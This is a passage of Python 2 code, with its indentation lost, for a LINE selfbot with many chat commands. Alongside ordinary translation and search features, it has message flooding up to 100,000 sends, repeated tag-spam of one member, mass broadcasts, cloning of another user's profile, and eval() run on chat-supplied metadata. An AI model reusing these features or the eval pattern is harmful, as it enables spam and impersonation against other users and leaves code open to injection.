cl.sendText(msg.to,"He declined all invitations")
elif "Auto add" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.findAndAddContactsByMids(mi_d)
cl.sendText(msg.to,"Success Add all")
#==============================================================================#
elif "tagall" == msg.text.lower():
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
summon(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, len(nama)-1):
nm2 += [nama[j]]
summon(msg.to, nm2)
if jml > 200 and jml < 500:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, 199):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(200, 299):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(300, 399):
nm4 += [nama[l]]
summon(msg.to, nm4)
for m in range(400, len(nama)-1):
nm5 += [nama[m]]
summon(msg.to, nm5)
if jml > 500:
print "Terlalu Banyak Men 500+"
cnt = Message()
cnt.text = "Jumlah:\n" + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
elif "sider on" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to,"Cek Sider already on")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to, "Set reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "sider off" == msg.text.lower():
if msg.to not in wait2['readPoint']:
cl.sendText(msg.to,"Cek Sider already off")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
cl.sendText(msg.to, "Delete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
elif "sider" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
cl.sendText(msg.to, "Sider:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = cl.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = 'Lurkers:\n'
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nLurking time: %s\nCurrent time: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
cl.sendMessage(msg)
except Exception as error:
print error
pass
else:
cl.sendText(msg.to, "Lurking has not been set.")
elif "Gbroadcast: " in msg.text:
bc = msg.text.replace("Gbroadcast: ","")
gid = cl.getGroupIdsJoined()
for i in gid:
cl.sendText(i,"[Broadcast]\n\n"+bc+"\n\nline.me/ti/p/~mpskraakh")
elif "Cbroadcast: " in msg.text:
bc = msg.text.replace("Cbroadcast: ","")
gid = cl.getAllContactIds()
for i in gid:
cl.sendText(i, bc)
elif "GbroadcastImage: " in msg.text:
bc = msg.text.replace("GbroadcastImage: ","")
gid = cl.getGroupIdsJoined()
for i in gid:
cl.sendImageWithURL(i, bc)
elif "CbroadcastImage: " in msg.text:
bc = msg.text.replace("CbroadcastImage: ","")
gid = cl.getAllContactIds()
for i in gid:
cl.sendImageWithURL(i, bc)
elif "Spam change: " in msg.text:
wait["spam"] = msg.text.replace("Spam change: ","")
cl.sendText(msg.to,"spam changed")
elif "Spam add: " in msg.text:
wait["spam"] = msg.text.replace("Spam add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"spam changed")
else:
cl.sendText(msg.to,"Done")
elif "Spam: " in msg.text:
strnum = msg.text.replace("Spam: ","")
num = int(strnum)
for var in range(0,num):
cl.sendText(msg.to, wait["spam"])
elif "Spamtag @" in msg.text:
_name = msg.text.replace("Spamtag @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
xname = g.displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'}
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
else:
pass
elif "Spam" in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
elif ("Micadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Target ditambahkan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif ("Micdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Target dihapuskan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist"]:
if mimic["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "?? "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Mimic " in msg.text:
cmd = msg.text.replace("Mimic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Reply Message on")
else:
cl.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Reply Message off")
else:
cl.sendText(msg.to,"Sudah off")
#elif msg.text.lower() in dangerMessage:
# if msg.toType == 2:
# try:
# cl.kickoutFromGroup(msg.to,[msg.from_])
# except:
# cl.kickoutFromGroup(msg.to,[msg.from_])
elif "Setimage: " in msg.text:
wait["pap"] = msg.text.replace("Setimage: ","")
cl.sendText(msg.to, "Pap telah di Set")
elif msg.text in ["Papimage","Papim","Pap"]:
cl.sendImageWithURL(msg.to,wait["pap"])
elif "Setvideo: " in msg.text:
wait["pap"] = msg.text.replace("Setvideo: ","")
cl.sendText(msg.to,"Video Has Ben Set To")
elif msg.text in ["Papvideo","Papvid"]:
cl.sendVideoWithURL(msg.to,wait["pap"])
#==============================================================================#
elif '/image ' in msg.text:
googl = msg.text.replace('/image ',"")
url = 'https://www.google.com/search?hl=en&biw=1366&bih=659&tbm=isch&sa=1&ei=vSD9WYimHMWHvQTg_53IDw&q=' + googl
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
try:
start = timeit.timeit()
cl.sendImageWithURL(msg.to,path)
cl.sendText(msg.to, "Google Image \nType: Search Image\nWaktu dicari: %s" % (start) +"\nTotal Image Links = "+str(len(items)))
print "[Notif] Search Image Google Sucess"
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'mymid':
cl.sendText(msg.to,mid)
elif "Timeline: " in msg.text:
tl_text = msg.text.replace("Timeline: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Myname: " in msg.text:
string = msg.text.replace("Myname: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Changed " + string + "")
elif "Mybio: " in msg.text:
string = msg.text.replace("Mybio: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Changed " + string)
elif msg.text in ["Myname"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["Mybio"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["Mypict"]:
h = cl.getContact(mid)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Myvid"]:
h = cl.getContact(mid)
cl.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Urlpict"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Mycover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
elif msg.text in ["Urlcover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendText(msg.to, path)
elif "Getmid @" in msg.text:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
elif "Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Getbio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
elif "Getname" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "Getprofile" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Getcontact" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Getpict @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getpict @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Getvid @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getvid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendVideoWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Picturl @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Picturl @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Getcover @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Coverurl @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Coverurl @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Getgrup image" in msg.text:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Urlgrup image" in msg.text:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendText(msg.to,path)
elif "Mycopy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif msg.text in ["Mybackup","mybackup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
#==============================================================================#
elif "/fancytext: " in msg.text.lower():
txt = msg.text.replace("/fancytext: ", "")
t1 = "\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xa0\x81\xf4\x80\xa0\x81\xf4\x80\xa0\x81"
t2 = "\xf4\x80\x82\xb3\xf4\x8f\xbf\xbf"
cl.sendText(msg.to, t1 + txt + t2)
#-------------------------------------------------
elif "/translate" in msg.text:
cl.sendText(msg.to,"contoh :\n- id to english : /en aku\n- english to id : /id you\n- id to japan : /jp halo\n- japan to id : /jpid kimochi\n- id to korea : /kor pagi\n- id to malaysia : /malay enak\n- id to arab : /arab jalan\n- id to jawa : /jawa kamu")
elif "/id " in msg.text:
isi = msg.text.replace("/id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "/en " in msg.text:
isi = msg.text.replace("/en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "/jp " in msg.text:
isi = msg.text.replace("/jp ","")
translator = Translator()
hasil = translator.translate(isi, dest='ja')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "/jpid " in msg.text:
isi = msg.text.replace("/jpid ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "/kor " in msg.text:
isi = msg.text.replace("/kor ","")
translator = Translator()
hasil = translator.translate(isi, dest='ko')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "/malay " in msg.text:
isi = msg.text.replace("/malay ","")
translator = Translator()
hasil = translator.translate(isi, dest='ms')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "/arab " in msg.text:
isi = msg.text.replace("/arab ","")
translator = Translator()
hasil = translator.translate(isi, dest='ar')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "/jawa " in msg.text:
isi = msg.text.replace("/jawa ","")
translator = Translator()
hasil = translator.translate(isi, dest='jw')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
#---------------------------------------------------------------
elif "/removechat" in msg.text.lower():
try:
cl.removeAllMessages(op.param2)
print "[Command] Remove Chat"
cl.sendText(msg.to,"Done")
except Exception as error:
print error
cl.sendText(msg.to,"Error")
#---------------------------------------------------------
elif msg.text.lower() == 'welcome':
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
jawaban1 = ("Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
elif "Say-id " in msg.text:
say = msg.text.replace("Say-id ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-en " in msg.text:
say = msg.text.replace("Say-en ","")
lang = 'en'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-jp " in msg.text:
say = msg.text.replace("Say-jp ","")
lang = 'ja'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-ar " in msg.text:
say = msg.text.replace("Say-ar ","")
lang = 'ar'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-ko " in msg.text:
say = msg.text.replace("Say-ko ","")
lang = 'ko'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Kapan " in msg.text:
tanya = msg.text.replace("Kapan ","")
jawab = ("kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
cl.sendAudio(msg.to,'tts.mp3')
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
cl.sendAudio(msg.to,'tts.mp3')
elif '/video ' in msg.text:
try:
textToSearch = (msg.text).replace('/video ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class': 'yt-uix-tile-link'})
ght = ('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to, ght)
except:
cl.sendText(msg.to, "Could not find it")
elif "/youtube " in msg.text:
query = msg.text.replace("/youtube ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
hasil = ""
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
hasil += ''.join((a['title'],'\nUrl : http://www.youtube.com' + a['href'],'\n\n'))
cl.sendText(msg.to,hasil)
print '[Command] Youtube Search'
elif "Lirik " in msg.text:
try:
songname = msg.text.lower().replace("Lirik ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif "Wikipedia " in msg.text:
try:
wiki = msg.text.lower().replace("Wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Music " in msg.text:
try:
songname = msg.text.lower().replace("Music ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[4])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif "Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "/cekig " in msg.text:
try:
instagram = msg.text.replace("/cekig ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "Link: " + "https://www.instagram.com/" + instagram
text = "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollower : "+followerIG+"\nFollowing : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link
cl.sendText(msg.to, str(text))
cl.sendImageWithURL(msg.to, profileIG)
except Exception as e:
cl.sendText(msg.to, str(e))
elif "/postig" in msg.text:
separate = msg.text.split(" ")
user = msg.text.replace(separate[0] + " ","")
if user.startswith("@"):
user = user.replace("@","")
profile = "https://www.instagram.com/" + user
with requests.session() as x:
x.headers['user-agent'] = 'Mozilla/5.0'
end_cursor = ''
for count in range(1, 999):
print('PAGE: ', count)
r = x.get(profile, params={'max_id': end_cursor})
data = re.search(r'window._sharedData = (\{.+?});</script>', r.text).group(1)
j = json.loads(data)
for node in j['entry_data']['ProfilePage'][0]['user']['media']['nodes']:
if node['is_video']:
page = 'https://www.instagram.com/p/' + node['code']
r = x.get(page)
url = re.search(r'"video_url": "([^"]+)"', r.text).group(1)
print(url)
cl.sendVideoWithURL(msg.to,url)
else:
print (node['display_src'])
cl.sendImageWithURL(msg.to,node['display_src'])
end_cursor = re.search(r'"end_cursor": "([^"]+)"', r.text).group(1)
elif msg.text.lower() == 'time':
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bulan = blan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
elif "Checkdate " in msg.text:
tanggal = msg.text.replace("Checkdate ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"============ I N F O R M A S I ============\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n============ I N F O R M A S I ============")
elif msg.text.lower() == 'kalender':
wait2['setTime'][msg.to] = datetime.today().strftime('TANGGAL : %Y-%m-%d \nHARI : %A \nJAM : %H:%M:%S')
cl.sendText(msg.to, "KALENDER\n\n" + (wait2['setTime'][msg.to]))
#==============================================================================#
elif msg.text.lower() == 'ifconfig':
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif msg.text.lower() == 'reboot':
print "[Command]Restart"
try:
cl.sendText(msg.to,"Restarting...")
cl.sendText(msg.to,"Restart Success")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif "Turn off" in msg.text:
try:
import sys
sys.exit()
except:
pass
elif msg.text.lower() == 'runtime':
cl.sendText(msg.to,"「Please wait..」\nType :Loading...\nStatus : Loading...")
eltime = time.time() - mulai
van = "Type : Bot Sedang Berjalan \nStatus : Aktif \nBot sudah berjalan selama"+waktu(eltime)
cl.sendText(msg.to,van)
#==============================================================================#
#==============================================================================#
elif "Ban @" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,_nametarget + " Not Found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
cl.sendText(msg.to,_nametarget + " Succes Add to Blacklist")
except:
cl.sendText(msg.to,"Error")
elif "Unban @" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,_nametarget + " Not Found")
else:
for target in targets:
try:
del wait["blacklist"][target]
cl.sendText(msg.to,_nametarget + " Delete From Blacklist")
except:
cl.sendText(msg.to,_nametarget + " Not In Blacklist")
elif "Ban:" in msg.text:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
